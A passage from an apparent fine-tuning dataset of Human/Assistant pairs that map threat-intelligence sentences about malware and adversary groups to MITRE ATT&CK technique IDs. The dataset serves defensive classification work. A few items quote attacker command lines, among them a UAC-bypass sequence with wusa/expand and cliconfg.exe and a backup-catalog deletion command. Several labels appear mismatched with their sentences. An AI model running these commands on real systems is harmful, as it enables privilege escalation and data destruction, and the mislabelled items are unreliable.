decrypted after being downloaded.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL connects to port 80 of a C2 server using Wininet API.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MiniDuke can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Komplex C2 channel uses HTTP POST requests.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete used the startup folder for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use the Windows Command Shell for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChChes establishes persistence by adding a Registry Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,so that it's hidden from users by default.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has used SSH for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework., attrib +h ### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 used JavaScript scripts to help perform tasks on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang actors have been known to copy files to the network shares of other computers to move laterally.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound stole domain credentials from Microsoft Active Directory Domain Controller and leveraged Mimikatz.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer queries the system to identify existing services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has been launched by starting iexplore.exe and replacing it with Bandook's payload.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may purchase domains similar to legitimate domains during acquisition of infrastructure to help facilitate Malicious Link.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar has a variant with a packed payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities .### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,capturing audio ### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae can download files from C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito runs tasklist to obtain running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT encrypts collected data with AES and Base64 and then sends it to the C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These AppleEvent messages can be sent independently or easily scripted with AppleScript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XAgentOSX contains the takeScreenShot functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe enumerates the IP address, network proxy settings, and domain name from a victim's system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox can enumerate the username on a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Andariel has conducted spearphishing campaigns that included malicious Word or Excel attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The configuration data is encrypted with the same algorithm described previously by JPCert but using a different XOR value### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used PowerSploit's Invoke-Kerberoast module to request encrypted service tickets and bruteforce the passwords of Windows service accounts offline.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may obfuscate command and control traffic to make it more difficult to detect.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has used packed DLL payloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya can use PsExec, which interacts with the ADMIN$ network share to execute commands on remote systems.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The specific sandbox checks include: Using WMI to check BIOS version (SMBIOSBIOSVERSION) for VBOX, bochs, qemu, virtualbox and vm### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN5 has used legitimate VPN, Citrix, or VNC credentials to maintain access to a victim environment.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has masqueraded as a 7zip installer.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy's uninstaller has base64-encoded its variables.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some network designs require NAT for the packets to cross the border device.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 created accounts disguised as legitimate backup and service accounts as well as an email administration account.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo requires the user to double-click the executable to run the malicious HTA file or to download a malicious installer.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can use the Windows command line to delete volume shadow copies and disable recovery.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has set up auto forwarding rules on compromised e-mail accounts.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi uses BITSAdmin to communicate with the C2 server over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used WMI event subscriptions for persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tools such as Systeminfo can be used to gather detailed system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This variation of the technique is often referred to as a ""Squiblydoo"" attack and has been used in campaigns targeting governments.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack can retrieve file listings from the victim machine.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon establishes persistence in the Startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Web applications and services often use session cookies, tokens, or other materials to authenticate and authorize user access.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork developed a file stealer to search C:\ and collect files with certain extensions.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The final part of the VBA script changes the properties of these two files, setting their attributes to Hidden### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Is this a Windows-only threat? Which versions of Windows are targeted? Poseidon is particularly focused on the Microsoft Windows operating system family, specifically customizing the infection method for each one so as to gather different information and hide its presence after the initial infection### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,zwShell can launch command-line shells.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes stored its instructions in a config file in the Registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use the Wake-on-LAN feature to turn on powered off systems.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Newer variants of BACKSPACE will encode C2 communications with a custom system.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has enumerated hosts, gathering username, machine name, and administrative permissions information.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pisloader uses cmd.exe to set the Registry Run key value.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoJax has modified the Registry key ‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’ from ‘autocheck autochk *’ to ‘autocheck autoche *’ in order to execute its payload during Windows startup.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop can uninstall or disable security products.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is common for one-time codes to be sent via out-of-band communications .### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has sent spearphising emails with malicious links to potential victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has called GetIpNetTable in attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork attempted to use RDP to move laterally.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin uses WMI to check BIOS version for VBOX, bochs, qemu, virtualbox, and vm to check for evidence that the script might be executing within an analysis environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDFSNIFFER has used several Win32 API functions to interact with the victim machine.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has scanned and looked for cryptographic keys and certificate file extensions.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie runs the net view command Remsec can ping or traceroute a remote host.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,it operates over DNS traffic, but can also switch to encrypted channels such as HTTPS or SSL### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group clearly shows a preference for using a simple downloader like Zebrocy as first-stage payloads in these attacks### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus can collect information on the Windows directory and searches for compressed RAR files on the host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HALFBAKED can execute PowerShell scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to cause a denial of service by directly sending a high-volume of network traffic to a target.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, there is a tty_tickets variable that treats each new tty in isolation.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many command shell utilities can be used to obtain this information.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito uses the ipconfig command.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This utility is able to execute complicated WQL queries and WMI methods### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon decrypts ciphertext using an XOR cipher and a base64-encoded string.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke can query the Registry to check for the presence of HKCU\Software\KasperskyLab.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner has checked for the presence of ""Little Snitch"", macOS network monitoring and application firewall software, stopping and exiting if it is found.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol and Simple Authentication Security Layer exchanges.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can register itself for execution and persistence via the Control Panel.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware Capabilities WINDSHIELD Command and control (C2) communications via TCP raw sockets Four configured C2s and six configured ports – randomly-chosen C2/port for communications Registry manipulation Get the current module's file name Gather system information including registry values, user name, computer name, and current code page File system interaction including directory creation, file deletion, reading, and writing files Load additional modules and execute code Terminate processes Anti-disassembly KOMPROGO Fully-featured backdoor capable of process, file, and registry management Creating a reverse shell File transfers Running WMI queries Retrieving information about the infected system SOUNDBITE C2 communications via DNS Process creation File upload Shell command execution File and directory enumeration/manipulation Window enumeration Registry manipulation System information gathering PHOREAL C2 communications via ICMP Reverse shell creation Filesystem manipulation Registry manipulation Process creation File upload BEACON (Cobalt Strike) Publicly available payload that can inject and execute arbitrary code into processes Impersonating the security context of users Importing Kerberos tickets Uploading and downloading files Executing shell commands Configured with malleable C2 profiles to blend in with normal network traffic Co-deployment and interoperability with Metasploit framework SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB Table 3: APT32 Malware and Capabilities APT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This shellcode injects the final payload taken from the resource section into the original RegAsm.exe process### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When each file is encrypted, registry keys are created under HKU\{SID}\Software\Microsoft\ RestartManager \ which are used to track metadata pertaining to the file being encrypted, such as owner, sequence, session and file hash### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It may also create the Registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ IMJPMIJ8.1{3 characters of Unique Identifier}.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay has the ability to switch between TCP and HTTP for C2 if one method is not working.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can modify the binary ACL to prevent security tools from running.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has exfiltrated data using USB storage devices.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy has exfiltrated data to the designated C2 server using HTTP POST requests.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth can download additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The database is located in the “/usr/lib/cva-ssys/My_BD” folder (“~/.local/cva-ssys/My_BD”—if the Trojan does not have root privileges)### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer relies on users mounting and executing a malicious DMG file.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used Rubeus, MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet to steal AES hashes.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements.### Assistant: T1535: Unused/Unsupported Cloud Regions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The macro then extracts the CAB file into %systemroo%\system32, using either wusa.exe or expand.exe (depending on the OS) to again bypass UAC prompts Once the files have been extracted, the Visual Basic macro deletes the CAB file and runs the malicious NTWDBLIB.dll via cliconfg.exe (to gain privileges and bypass UAC protections) Command lines used by the Visual Basic macro: cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe A combination of NTWDBLIB.dll and cliconfg.exe are used to bypass UAC protections; this is a familiar attack on Windows### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Seasalt has a command to download additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT has used Windows Video Service as a name for malicious services.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SodaMaster has the ability to put itself to ""sleep"" for a specified time.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY can gather AVs registered in the system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can create a task named to appear benign.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak encodes the message body of HTTP traffic with Base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT collects various information via WMI requests, including CPU information in the Win32_Processor entry .### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather credentials that can be used during targeting.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,dir c:\### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole also has a built-in command to modify file times.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can perform audio surveillance using microphones.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The NETWIRE payload has been injected into benign Microsoft executables via process hollowing.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can check the Registry for the presence of HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\last_edate to determine how long it has been installed on a host.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete collects the hostname of the target computer.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system Inhibit System Recovery without prompts to the user .### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used cmd.exe to execute commands on remote machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unlike Invalid Code Signature, this activity will result in a valid signature.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop can enumerate all processes on the victim's machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used a renamed cmd.exe file to evade detection.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ECCENTRICBANDWAGON has encrypted strings with RC4.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has retrieved internal documents from machines inside victim environments, including by using Forfiles to stage documents before exfiltration.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once patched, an adversary can use the injected password to successfully authenticate as any domain user account .### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary who finds a program vulnerable to search order hijacking , a program that does not specify the path to an executable may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One means, originally implemented by Cd00r , is to use the libpcap libraries to sniff for the packets in question.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Distributed COM is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call technology.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy installs a service pointing to a malicious DLL dropped to disk.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has monitored critical processes to ensure resiliency.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MURKYTOP has the capability to identify remote hosts on connected networks.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack can retrieve browser history.### Assistant: T1217: Browser Bookmark Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Successful execution of the macro within the malicious document results in the installation of APT28’s signature GAMEFISH malware### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It can also identify logical drives for the infected machine.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT checks for sandboxing libraries.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe has used dynamic DNS services to set up C2.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gatekeeper also monitors an application's usage of dynamic libraries loaded outside the application folder on any quarantined binary, often using the dlopen function.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has used a tool that can obtain info about local and global group users, power users, and administrators.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used fsutil fsinfo drives to list connected drives.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OceanSalt has been executed via malicious macros.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete renamed task names to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python tasks.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT uses a custom encryption algorithm on data sent back to the C2 server over HTTP.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has been delivered via spearphishing e-mails with password protected ZIP files.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This build tool encrypts the binary’s strings with a fresh key for each build### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The string is formatted as “||||||||” ^slp Sets the sleep and jitter values ^exit Exits the Trojan Table 5 Commands available within the C# variant of RogueRobin Using Google Drive for C2 A command that was not available in the original PowerShell variant of RogueRobin but is available with the new C# variant is the x_mode### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla surveys a system upon check-in to discover operating system configuration details using the systeminfo and set commands.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has used a Python tool named Browdec.exe to steal browser credentials.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This, however, will not delete/flush the ConsoleHost_history.txt file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher clears the system event logs using OpenEventLog/ClearEventLog APIs .### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.### Assistant: T1613: Container and Resource Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY has the ability to set a Registry key to run a cmd.exe command.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It appears the same actor developed both the Komplex and XAgentOSX tools, based on similarities within the following project paths found within the tools: Komplex: /Users/kazak/Desktop/Project/komplex XAgent OSX: /Users/kazak/Desktop/Project/XAgentOSX We believe it is possible that Sofacy uses Komplex to download and install the XAgentOSX tool to use its expanded command set on the compromised system### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has removed files from victim machines.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has been delivered via phishing e-mails with malicious attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay has named services and scheduled tasks to appear benign including ""ChromeCheck"" and ""googleupdate.""### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data SPACESHIP copies to the staging area is compressed with zlib.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variation of the the technique, ""domainless"" fronting, utilizes a 